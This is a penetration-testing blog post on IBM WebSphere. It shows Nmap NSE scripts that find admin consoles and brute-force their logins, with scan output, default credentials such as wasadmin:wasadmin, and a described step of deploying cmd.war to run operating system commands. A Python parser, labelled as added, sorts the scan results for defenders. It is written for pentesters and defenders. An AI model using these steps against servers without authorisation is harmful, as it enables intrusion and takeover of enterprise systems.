Identifying and exploiting IBM WebSphere Application Server

July 13, 2015

IBM WebSphere is an application server similar to Tomcat, JBoss and WebLogic. Therefore, it should be interesting to any penetration tester doing enterprise-scale work where WebSphere might be present. It should also be interesting to anyone working on securing an enterprise environment, since WebSphere allows deploying your own (malicious or not) code to the server.

I have written NSE scripts to identify the consoles of IBM WebSphere application servers and to brute-force usernames and passwords against them. I will also demonstrate the basics of WebSphere exploitation.

In order to identify WebSphere consoles you will need the NSE scripts available at https://github.com/kost/nmap-nse; you can clone the git repository with the following commands:

git clone https://github.com/kost/nmap-nse.git
cd nmap-nse/scripts

I have submitted the scripts for inclusion in Nmap, but until they are part of Nmap you will have to download them from the repository above. Once the NSE script is available, running nmap with the WebSphere NSE script is simple:

nmap -p- -sV -sT --script=./http-websphere-console.nse 172.17.0.1

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-07-13 05:49 CEST
Nmap scan report for 172.17.0.1
Host is up (0.000049s latency).
Not shown: 65525 closed ports
PORT      STATE SERVICE     VERSION
28000/tcp open  http        IBM Tivoli Enterprise Portal (Servlet 3.0)
28001/tcp open  ssl/http    IBM Tivoli Enterprise Portal (Servlet 3.0)
| http-websphere-console:
|   consoles:
|_    WebSphere at /ibm/console/logon.jsp?action=OK
28002/tcp open  giop        CORBA naming service
28003/tcp open  ssl/http    IBM WebSphere Application Server 8.0
|_http-server-header: WebSphere Application Server/8.0
28006/tcp open  ssl/giop    CORBA naming service
28007/tcp open  ssl/unknown
28008/tcp open  giop        CORBA naming service
28009/tcp open  unknown
28010/tcp open  ssl/unknown
28020/tcp open  ssl/unknown

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.13 seconds

As you can see from the port scan, the NSE script identified a WebSphere console available at the URI /ibm/console/logon.jsp?action=OK.

If you go to that URI, you will be greeted with a username and password login form:

As you can see, this is the standard IBM WebSphere Application Server console. So I have made another NSE script, http-websphere-console-brute.nse, which can help you with guessing the username and password. Usage is simple:

nmap -p28001 -sV -sT --script=./http-websphere-console-brute.nse --script-args 'userdb=users.txt,passdb=passwd.txt' 172.17.0.1

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-07-13 06:30 CEST
Nmap scan report for 172.17.0.1
Host is up (0.00011s latency).
PORT      STATE SERVICE  VERSION
28001/tcp open  ssl/http IBM Tivoli Enterprise Portal (Servlet 3.0)
| http-websphere-console-brute:
|   Accounts:
|     wasadmin:wasadmin - Valid credentials
|_  Statistics: Performed 1 guesses in 1 seconds, average tps: 1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.76 seconds

As you can see, the NSE script guessed the IBM WebSphere credentials: username wasadmin with password wasadmin. Another good credential pair to try is username system with password manager.
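When the two scripts above are run across a whole estate (for example by a defender inventorying which WebSphere consoles are reachable and still accept guessable passwords), the interesting lines are buried in ordinary Nmap output. The following parser is an added example, not code from the original post or from the nmap-nse repository; it reads Nmap's normal output format and keeps only ports where http-websphere-console reported a console or http-websphere-console-brute reported valid credentials. The sample report embedded in it is constructed by merging the two runs shown above.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the two Nmap runs from this post merged into one report.
SAMPLE_REPORT = """\
Nmap scan report for 172.17.0.1
28001/tcp open  ssl/http  IBM Tivoli Enterprise Portal (Servlet 3.0)
| http-websphere-console:
|   consoles:
|_    WebSphere at /ibm/console/logon.jsp?action=OK
| http-websphere-console-brute:
|   Accounts:
|     wasadmin:wasadmin - Valid credentials
|_  Statistics: Performed 1 guesses in 1 seconds, average tps: 1
28003/tcp open  ssl/http  IBM WebSphere Application Server 8.0
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+open\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^\|_?\s?([A-Za-z0-9-]+):")  # '| script-name:' header line
CONSOLE_RE = re.compile(r"WebSphere at (\S+)")
CRED_RE = re.compile(r"^\|_?\s+(\S+):(\S*) - Valid credentials")

@dataclass
class Finding:
    host: str
    port: int
    service: str
    version: str
    consoles: list = field(default_factory=list)     # console URIs reported
    valid_creds: list = field(default_factory=list)  # (user, password) pairs accepted

def parse_report(text):
    """Findings for every open port exposing a console or accepting guessed credentials."""
    ports, host, cur, script = [], None, None, None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            host = m.group(1)
        elif m := PORT_RE.match(line):
            cur = Finding(host, int(m.group(1)), m.group(2), m.group(3).strip())
            ports.append(cur)
            script = None                       # script output follows its port line
        elif line.startswith("|") and cur is not None:
            if m := SCRIPT_RE.match(line):      # a new script's block starts here
                script = m.group(1)
            if script == "http-websphere-console" and (m := CONSOLE_RE.search(line)):
                cur.consoles.append(m.group(1))
            elif script == "http-websphere-console-brute" and (m := CRED_RE.match(line)):
                cur.valid_creds.append((m.group(1), m.group(2)))
    return [p for p in ports if p.consoles or p.valid_creds]
```

Feed it the saved normal output (nmap -oN) of a larger scan; ports such as 28003 above, where neither script reported anything, are dropped from the result.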

After a successful username/password guess you can log in to the console:

After logging in to the console, you can configure the application server and install and deploy applications. In the case of an attacker, that usually consists of deploying cmd.war in order to execute operating system commands:

The next step would be going to the cmd.war application URL and executing operating system commands. But I guess you know how to go on from here: it is simple and the same as with any other application server.

References and further links

GitHub page:

https://github.com/kost/nmap-nse

Nmap-dev post:

http://seclists.org/nmap-dev/2015/q3/73

In this blog post, I have demonstrated the basics of WebSphere exploitation. After this, I think you're ready to explore the following URLs:

http://erpscan.com/wp-content/uploads/pub/Penetration%20from%20application%20down%20to%20OS%20(IBM%20Websphere).pdf

http://www.securitytube.net/video/3298

Good luck with your IBM WebSphere adventures!